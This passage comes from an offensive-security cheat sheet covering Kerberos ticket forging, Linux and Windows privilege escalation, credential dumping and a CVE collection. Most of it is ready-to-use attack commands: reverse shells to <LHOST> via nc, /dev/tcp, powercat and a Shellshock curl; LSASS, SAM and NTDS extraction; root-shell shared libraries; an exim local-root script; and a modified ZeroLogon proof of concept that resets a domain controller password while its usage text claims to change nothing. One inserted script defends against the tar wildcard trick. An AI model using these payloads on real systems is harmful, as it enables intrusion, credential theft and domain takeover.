export KRB5CCNAME=<USERNAME>.ccache
Execute remote commands with the TGT
impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
Mimikatz examples
Generate a TGT with NTLM
kerberos::golden /domain:<DOMAIN> /sid:<SID> /rc4:<KRBTGT_NTLM_HASH> /user:<USERNAME>
Generate a TGT with an AES 128 key
kerberos::golden /domain:<DOMAIN> /sid:<SID> /aes128:<KEY> /user:<USERNAME>
Generate a TGT with an AES 256 key (stronger encryption, possibly stealthier since it is the default)
kerberos::golden /domain:<DOMAIN> /sid:<SID> /aes256:<KEY> /user:<USERNAME>
Inject the TGT with Mimikatz
kerberos::ptt <KIRBI_FILE>
Rubeus example
Inject a ticket with Rubeus
.\Rubeus.exe ptt /ticket:<KIRBI_FILE>
Execute CMD on the remote host
.\PsExec.exe -accepteula \\<RHOST> cmd
Get the NT hash from a password
python3 -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).digest()).decode())'

LDAPsearch

ldapsearch -H ldap://<RHOST> -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -H ldaps://<RHOST>:636/ -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -x -H ldap://<RHOST> -D '' -w '' -b "DC=<RHOST>,DC=local"
ldapsearch -x -H ldap://<RHOST> -D '' -w '' -b "DC=<RHOST>,DC=local" | grep descr -A 3 -B 3
ldapsearch -H ldap://<RHOST> -D <USERNAME> -w "<PASSWORD>" -b "CN=Users,DC=<RHOST>,DC=local" | grep info

Linux

Basic Linux enumeration
id
sudo -l
uname -a
env
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
ls -la /opt
capsh --print
find commands
find / -user <USERNAME> -ls 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null
find / -group <GROUP> 2>/dev/null
find / -perm -4000 2>/dev/null | xargs ls -la
find / -type f -user root -perm -4000 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -cmin -60 // find files changed in the last 60 minutes
find / -amin -60 // find files accessed in the last 60 minutes
find ./ -type f -exec grep --color=always -i -I 'password' {} \; // search for passwords
grep for passwords
grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf
grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$" // grep for passwords like "DBPassword:"
APACHE2
Read the first line of a file with the apache2 binary
sudo /usr/sbin/apache2 -f <FILE>
APT
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"};' > /etc/apt/apt.conf.d/<FILE>
ARIA2C
aria2c -d /root/.ssh/ -o authorized_keys "http://<LHOST>/authorized_keys" --allow-overwrite=true
Bash debugging mode
    • Bash <4.4
      env -i SHELLOPTS=xtrace PS4='$(chmod +s /bin/bash)' /usr/local/bin/<BINARY>
Bash functions
    • Bash <4.2-048
      function /usr/sbin/<BINARY> { /bin/bash -p; }
      export -f /usr/sbin/<BINARY>
      /usr/sbin/<BINARY>
LD_PRELOAD

https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/

shell.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

// runs when the library is loaded (-nostartfiles); drops LD_PRELOAD so the child does not inherit it
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}

Or

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
Compile
gcc -o <SHARED_OBJECT>.so <FILE>.c -shared -fPIC -nostartfiles
Privilege escalation
sudo LD_PRELOAD=/PATH/TO/SHARED_OBJECT/<SHARED_OBJECT>.so <BINARY>
LD_LIBRARY_PATH
Get information about libraries
ldd /PATH/TO/BINARY/<BINARY>
shell.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
Compile
gcc -o <LIBRARY>.so.<NUMBER> -shared -fPIC <FILE>.c
Privilege escalation
sudo LD_LIBRARY_PATH=/PATH/TO/LIBRARY/<LIBRARY>.so.<NUMBER> <BINARY>
logrotten

https://github.com/whotwagner/logrotten

if [ `id -u` -eq 0 ]; then ( /bin/sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 ); fi
If the "create" option is set in logrotate.cfg
./logrotten -p ./payloadfile /tmp/log/pwnme.log
If the "compress" option is set in logrotate.cfg
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
PATH variable hijacking
find / -perm -u=s -type f 2>/dev/null
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
export PATH=$(pwd):$PATH
PHP7.2
/usr/bin/php7.2 -r "pcntl_exec('/bin/bash', ['-p']);"

rbash

Breaking out using the $PATH variable
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Breaking out using less
less /etc/profile
!/bin/sh
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v
less /etc/profile
v:shell
Breaking out using scp
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
scp -S $TF x y:
Breaking out using vi
vi -c ':!/bin/sh' /dev/null
vi
:set shell=/bin/sh
:shell
Breaking out using SSH command execution
ssh <USERNAME>@<RHOST> -t sh
ssh <USERNAME>@<RHOST> -t /bin/sh
ssh <USERNAME>@<RHOST> -t "/bin/bash --no-profile"
relayd

The binary needs to have the SUID bit set.

/usr/sbin/relayd -C /etc/shadow
Shared library misconfiguration

https://tbhaxor.com/exploiting-shared-library-misconfigurations/

shell.c
#include <stdlib.h>
#include <unistd.h>

void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
}
Compile
gcc -shared -fPIC -nostartfiles -o <FILE>.so <FILE>.c
Wildcards

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

The command touch -- --checkpoint=1 creates a file. Why? Because the -- after the touch command tells touch that no further options follow. So instead of an option it creates a file named --checkpoint=1.

touch -- --checkpoint=1

or

touch ./--checkpoint=1

Therefore, after creating the --checkpoint=1 file, I create another file that executes a shell script.

touch -- '--checkpoint-action=exec=sh shell.sh'

or

touch ./--checkpoint-action=exec=<FILE>

To delete the misconfigured file, prefix it with ./.

rm ./'--checkpoint-action=exec=python script.sh'
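As an added example (not part of the original notes), the defensive side of the wildcard trick described above: a POSIX sh script that counts option-like file names in a directory, the ones a cron job running tar with a shell glob would receive as options, and archives the directory in a way that never puts file names on tar's command line. It assumes GNU tar, find and mktemp; the sample directory and file names are constructed.

```shell
#!/bin/sh
# Added example (not from the original notes): detecting and defusing the
# tar wildcard trick. Assumes POSIX sh, find, mktemp and GNU tar.

# Print the number of entries directly inside DIR whose name starts with "-".
# With a glob such as `tar cf backup.tar *` the shell would pass these names
# to tar as options (e.g. --checkpoint-action=exec=...) instead of as files.
count_option_names() {
    dir=$1
    n=0
    for entry in "$dir"/* "$dir"/.*; do
        [ -e "$entry" ] || continue
        name=${entry##*/}
        case $name in
            -*) printf 'option-like name: %s\n' "$name" >&2; n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Archive DIR into ARCHIVE (absolute path) without letting any file name reach
# tar's command line: find feeds NUL-separated "./name" paths on stdin and
# --null makes tar read them verbatim, so "--checkpoint=1" is stored as an
# ordinary file. Prints the number of entries stored in the archive.
safe_archive() {
    dir=$1
    archive=$2
    (cd "$dir" && find . -mindepth 1 -print0 | tar --null -T - -cf "$archive") || return 1
    tar -tf "$archive" | wc -l | tr -d ' '
}

# Constructed sample: a world-writable directory in which an unprivileged user
# dropped two option-like names next to a legitimate file.
make_sample_dir() {
    sample=$(mktemp -d)
    echo "index" > "$sample/index.html"
    : > "$sample/--checkpoint=1"
    : > "$sample/--checkpoint-action=exec=sh shell.sh"
    echo "$sample"
}

if [ "${1:-}" = "demo" ]; then
    d=$(make_sample_dir)
    echo "option-like names: $(count_option_names "$d")"
    echo "entries archived:  $(safe_archive "$d" "$d.tar")"
    rm -rf "$d" "$d.tar"
fi
```

Run with the argument demo to see both checks on the constructed sample directory.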
Writable directories in Linux
/dev/shm
/tmp

Microsoft Windows

Basic Windows enumeration
systeminfo
whoami /all
net user
net user /domain
net user <USERNAME>
tree /f C:\Users\
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *cred* == *vnc* == *.config*
accesschk.exe -uws "Everyone" "C:\Program Files\"
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
AppLocker bypass list
Bypass List (Windows 10 Build 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
accesschk
Check file permissions
.\accesschk.exe /accepteula -quvw "C:\PATH\TO\FILE\<FILE>.exe"
Check service permissions
.\accesschk.exe /accepteula -uwcqv <USERNAME> daclsvc
Check path permissions to find unquoted service paths
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\<UNQUOTED_SERVICE_PATH>"
Check registry keys
.\accesschk.exe /accepteula -uvwqk <REGISTRY_KEY>
Add a user to a group
net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" /add <USERNAME>
net localgroup "Remote Management Users" /add <USERNAME>
Enable Remote Desktop (RDP)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

or

Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0;
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1;
Enable-NetFirewallRule -DisplayGroup "Remote Desktop";
Privileges and permissions
AlwaysInstallElevated
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> -f msi > <FILE>.msi
msiexec /quiet /qn /i <FILE>.msi
SeBackup and SeRestore privileges
Back up the SAM and SYSTEM hashes
reg save hklm\system C:\Users\<USERNAME>\system.hive
reg save hklm\sam C:\Users\<USERNAME>\sam.hive
Dump hashes
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
SeBackupPrivilege privilege escalation (diskshadow)

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

PowerShell environment script
SET CONTEXT PERSISTENT NOWRITERSp
add volume c: alias foobarp
createp
expose %foobar% z:p
diskshadow /s <FILE>.txt
Copy ntds.dit
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ndts.dit
Export the SYSTEM registry value
reg save HKLM\SYSTEM c:\temp\system
Extract hashes
impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL
Alternative via Robocopy
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
set metadata C:\Windows\temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
diskshadow /s script.txt
robocopy /b E:\Windows\ntds . ntds.dit
impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL
SeLoadDriverPrivilege
sc.exe query
$services=(get-service).name | foreach {(Get-ServiceAcl $_) | where {$_.access.IdentityReference -match 'Server Operators'}}
sc.exe config VSS binpath="C:\temp\nc64.exe -e cmd <LHOST> <LPORT>"
sc.exe stop VSS
sc.exe start VSS
SeTakeOwnershipPrivilege
takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant Everyone:F
C:\Windows\System32\> copy cmd.exe utilman.exe

Click the Ease of Access button on the login screen to get a shell with NT Authority\System privileges.

SeImpersonate and SeAssignPrimaryToken privileges

https://github.com/antonioCoco/RogueWinRM

.\RogueWinRM.exe -p "C:\> .\nc64.exe" -a "-e cmd.exe <LHOST> <LPORT>"
Registry handling
Enable colored output
reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Then open a new terminal window.

Check autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get registry key information
reg query <REGISTRY_KEY>
Modify registry key values
reg add <REGISTRY_KEY> /v <VALUE_TO_MODIFY> /t REG_EXPAND_SZ /d C:\PATH\TO\FILE\<FILE>.exe /f
Searching for credentials
Quick wins

https://twitter.com/NinjaParanoid/status/1516442028963659777?t=g7ed0vt6ER8nS75qd-g0sQ&s=09

https://www.nirsoft.net/utils/credentials_file_view.html

cmdkey /list
rundll32 keymgr.dll, KRShowKeyMgr
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
Search for passwords
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<USERNAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows credentials
cmdkey /list
runas /savecred /user:<USERNAME> cmd.exe
Winlogon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Local Administrator Password Solution (LAPS)
PS C:\> Get-ADComputer <RHOST> -property 'ms-mcs-admpwd'
Search the registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Dump credentials
reg save hklm\system system
reg save hklm\sam sam
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
Find KeePass databases
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Internet Information Services (IIS)
C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
PUTTY
reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s
LSASS
tasklist
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 688 C:\Users\Administrator\Documents\lsass.dmp full
Unattended Windows installations
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Insecure service permissions
accesschk64.exe -qlc <SERVICE>
icacls C:\Users\<USERNAME>\<FILE>.exe /grant Everyone:F
sc config <SERVICE> binPath= "C:\Users\<USERNAME>\<FILE>.exe" obj= LocalSystem
sc stop <SERVICE>
sc start <SERVICE>
Service handling
sc create <SERVICE_NAME>
sc start <SERVICE_NAME>
sc qc <SERVICE_NAME>
Scheduled tasks
schtasks
schtasks /query /tn <TASK> /fo list /v
schtasks /run /tn <TASK>
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Unquoted service paths

Search for unquoted service paths using sc qc.

sc qc
sc qc <SERVICE>
sc stop <SERVICE>
sc start <SERVICE>
icacls <PROGRAM>.exe
icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe
icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe /grant Everyone:F
WriteDACL

https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/

$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $SecPassword)
Add-ObjectACL -PrincipalIdentity <USERNAME> -Credential $Cred -Rights DCSync
WMIC
wmic product get name,version,vendor
wmic qfe get Caption,Description,HotFixID,InstalledOn # no new patches - KEXP pretty likely

Pass the Certificate

https://offsec.almond.consulting/authentication-with-certificates-when-pkinit-is-not-supported.html

https://github.com/AlmondOffSec/PassTheCert/tree/main/Python

certipy-ad cert -pfx <CERTIFICATE>.pfx -nokey -out <CERTIFICATE>.crt
certipy-ad cert -pfx <CERTIFICATE>.pfx -nocert -out <CERTIFICATE>.key
python3 passthecert.py -domain '<DOMAIN>' -dc-host '<DOMAIN>' -action 'modify_user' -target '<USERNAME>' -new-pass '<PASSWORD>' -crt ./<CERTIFICATE>.crt -key ./<CERTIFICATE>.key
evil-winrm -i '<RHOST>' -u '<USERNAME>' -p '<PASSWORD>'

PKINITtools

python3 gettgtpkinit.py -cert-pfx <USERNAME>.pfx -dc-ip <RHOST> <DOMAIN>/<USERNAME> <USERNAME>.ccache
export KRB5CCNAME=<USERNAME>.ccache
python3 getnthash.py <DOMAIN>/<USERNAME> -key 6617cde50b7ee63faeb6790e84981c746efa66f68a1cc3a394bbd27dceaf0554

Port scanning

export ip=<RHOST>; for port in $(seq 1 65535); do timeout 0.01 bash -c "</dev/tcp/$ip/$port && echo The port $port is open || echo The Port $port is closed > /dev/null" 2>/dev/null || echo Connection Timeout > /dev/null; done

powercat

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1');powercat -c <LHOST> -p <LPORT> -e cmd"

Powermad

Import-Module ./Powermad.ps1
$secureString = convertto-securestring "<PASSWORD>" -asplaintext -force
New-MachineAccount -MachineAccount <NAME> -Domain <DOMAIN> -DomainController <DOMAIN> -Password $secureString

PowerShell

Common commands
whoami /all
getuserid
systeminfo
Get-Process
net users
net users <USERNAME>
Get-ADUser -Filter * -SearchBase "DC=<DOMAIN>,DC=LOCAL"
Get-Content <FILE>
Get-ChildItem . -Force
GCI -hidden
type <FILE> | findstr /l <STRING>
[convert]::ToBase64String((Get-Content -path "<FILE>" -Encoding byte))
Allow script execution
Set-ExecutionPolicy remotesigned
Set-ExecutionPolicy unrestricted
Script execution bypass
powershell.exe -noprofile -executionpolicy bypass -file .\<FILE>.ps1
Import a module into PowerShell
Import-Module .\<FILE>
Check the PowerShell version
Set-ExecutionPolicy Unrestricted
powershell -Command "$PSVersionTable.PSVersion"
powershell -c "[Environment]::Is64BitProcess"
Read the PowerShell history
type C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Create a .zip file
Compress-Archive -LiteralPath C:\PATH\TO\FOLDER\<FOLDER> -DestinationPath C:\PATH\TO\FILE\<FILE>.zip
Unzip a file
Expand-Archive -Force <FILE>.zip
Start a new process
Start-Process -FilePath "C:\nc64.exe" -ArgumentList "<LHOST> <LPORT> -e powershell"
Invoke-Expression / Invoke-WebRequest
IEX(IWR http://<LHOST>/<FILE>.ps1)
Invoke-Expression (Invoke-WebRequest http://<LHOST>/<FILE>.ps1)
.NET reflection
$bytes = (Invoke-WebRequest "http://<LHOST>/<FILE>.exe" -UseBasicParsing ).Content
$assembly = [System.Reflection.Assembly]::Load($bytes)
$entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')
$entryPointMethod.Invoke($null, (, [string[]] ('find', '/<COMMAND>')))
Start an offsec session
$offsec_session = New-PSSession -ComputerName <RHOST> -Authentication Negotiate -Credential <USERNAME>
Enter-PSSession $offsec_session
Execute commands as another user
$SecurePassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<USERNAME>', $SecurePassword)
$Session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { whoami }

or

$username = '<USERNAME>'
$password = '<PASSWORD>'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process powershell.exe -Credential $credential
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
Add a new domain admin
$PASSWORD= ConvertTo-SecureString -AsPlainText -Force -String <PASSWORD>
New-ADUser -Name "<USERNAME>" -Description "<DESCRIPTION>" -Enabled $true -AccountPassword $PASSWORD
Add-ADGroupMember -Identity "Domain Admins" -Member <USERNAME>
Execute commands in a user context
$pass = ConvertTo-SecureString "<PASSWORD>" -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("<DOMAIN>\<USERNAME>", $pass)
Invoke-Command -computername <COMPUTERNAME> -ConfigurationName dc_manage -credential $cred -command {whoami}
Execute a script with credentials (reverse shell)
$pass = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass)
Invoke-Command -Computer <RHOST> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<LHOST>/<FILE>.ps1') } -Credential $cred

pwncat

(local) pwncat$ back    // get back to shell
Ctrl+d // get back to pwncat shell
pwncat-cs -lp <LPORT>
(local) pwncat$ download /PATH/TO/FILE/<FILE> .
(local) pwncat$ upload /PATH/TO/FILE/<FILE> /PATH/TO/FILE/<FILE>

RPCLIENT

rpcclient -U "" <RHOST>
dsr_getdcname
dsr_getdcnameex
dsr_getdcnameex2
dsr_getsitename
enumdata
enumdomgroups
enumdomusers
enumjobs
enumports
enumprivs
getanydcname
getdcname
lookupsids
lsaenumsid <SID>
lsaquery
netconnenum
netdiskenum
netfileenum
netsessenum
netshareenum
netshareenumall
netsharegetinfo
queryuser <USERNAME>
srvinfo

Rubeus.exe

Get service principal hashes
.\Rubeus.exe kerberoast /user:<USERNAME>
Pass-the-Hash
.\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials

RunasCs.exe

.\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT>
.\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT> --bypass-uac
.\RunasCs.exe -d <DOMAIN> "<USERNAME>" '<PASSWORD>' cmd.exe -r <LHOST>:<LPORT>
.\RunasCs.exe -l 3 -d <DOMAIN> "<USERNAME>" '<PASSWORD>' 'C:\Users\<USERNAME>\Downloads\<FILE>.exe'

smbpasswd

smbpasswd -U <RHOST>\<USERNAME> -r <RHOST>

winexe

winexe -U '<USERNAME%PASSWORD>' //<RHOST> cmd.exe
winexe -U '<USERNAME%PASSWORD>' --system //<RHOST> cmd.exe

CVE collection

CVE-2014-6271: Shellshock RCE PoC

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1' http://<RHOST>/cgi-bin/user.sh

CVE-2016-1531: exim LPE

  • exim version <= 4.84-3
    #!/bin/sh
    # CVE-2016-1531 exim <= 4.84-3 local root exploit
    # ===============================================
    # you can write files as root or force a perl module to
    # load by manipulating the perl environment and running
    # exim with the "perl_startup" argument -ps.
    #
    # e.g.
    # [fantastic@localhost tmp]$ ./cve-2016-1531.sh
    # [ CVE-2016-1531 local root exploit
    # sh-4.3# id
    # uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
    #
    # -- Hacker Fantastic
    echo [ CVE-2016-1531 local root exploit
    cat > /tmp/root.pm << EOF
    package root;
    use strict;
    use warnings;

    system("/bin/sh");
    EOF
    PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps

CVE-2019-14287: Sudo bypass

https://www.exploit-db.com/exploits/47502

Prerequisites
  • sudo version < 1.8.28
Exploitation
!root:
sudo -u#-1 /bin/bash

CVE-2020-1472: ZeroLogon PE

https://github.com/SecuraBV/CVE-2020-1472

https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py

Prerequisites
python3 -m pip install virtualenv
python3 -m virtualenv venv
source venv/bin/activate
pip install git+https://github.com/SecureAuthCorp/impacket
Proof-of-concept modification
newPassRequest = nrpc.NetrServerPasswordSet2()
newPassRequest['PrimaryName'] = dc_handle + '\x00'
newPassRequest['AccountName'] = target_computer + '$\x00'
newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
auth = nrpc.NETLOGON_AUTHENTICATOR()
auth['Credential'] = b'\x00' * 8
auth['Timestamp'] = 0
newPassRequest['Authenticator'] = auth
newPassRequest['ComputerName'] = target_computer + '\x00'
newPassRequest['ClearNewPassword'] = b'\x00' * 516
rpc_con.request(newPassRequest)
Weaponized proof of concept
#!/usr/bin/env python3

from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto

import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call

# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%

def fail(msg):
    print(msg, file=sys.stderr)
    print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
    sys.exit(2)

def try_zero_authenticate(dc_handle, dc_ip, target_computer):
    # Connect to the DC's Netlogon service.
    binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
    rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
    rpc_con.connect()
    rpc_con.bind(nrpc.MSRPC_UUID_NRPC)

    # Use an all-zero challenge and credential.
    plaintext = b'\x00' * 8
    ciphertext = b'\x00' * 8

    # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
    flags = 0x212fffff

    # Send challenge and authentication request.
    nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
    try:
        server_auth = nrpc.hNetrServerAuthenticate3(
            rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
            target_computer + '\x00', ciphertext, flags
        )

        # It worked!
        assert server_auth['ErrorCode'] == 0
        newPassRequest = nrpc.NetrServerPasswordSet2()
        newPassRequest['PrimaryName'] = dc_handle + '\x00'
        newPassRequest['AccountName'] = target_computer + '$\x00'
        newPassRequest['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
        auth = nrpc.NETLOGON_AUTHENTICATOR()
        auth['Credential'] = b'\x00' * 8
        auth['Timestamp'] = 0
        newPassRequest['Authenticator'] = auth
        newPassRequest['ComputerName'] = target_computer + '\x00'
        newPassRequest['ClearNewPassword'] = b'\x00' * 516
        rpc_con.request(newPassRequest)
        return rpc_con

    except nrpc.DCERPCSessionError as ex:
        # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
        if ex.get_error_code() == 0xc0000022:
            return None
        else:
            fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
    except BaseException as ex:
        fail(f'Unexpected error: {ex}.')


def perform_attack(dc_handle, dc_ip, target_computer):
    # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
    print('Performing authentication attempts...')
    rpc_con = None
    for attempt in range(0, MAX_ATTEMPTS):
        rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)

        if not rpc_con:
            print('=', end='', flush=True)
        else:
            break

    if rpc_con:
        print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
    else:
        print('\nAttack failed. Target is probably patched.')
        sys.exit(1)


if __name__ == '__main__':
    if not (3 <= len(sys.argv) <= 4):
        print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
        print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
        print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
        sys.exit(1)
    else:
        [_, dc_name, dc_ip] = sys.argv

        dc_name = dc_name.rstrip('$')
        perform_attack('\\\\' + dc_name, dc_ip, dc_name)
Execution
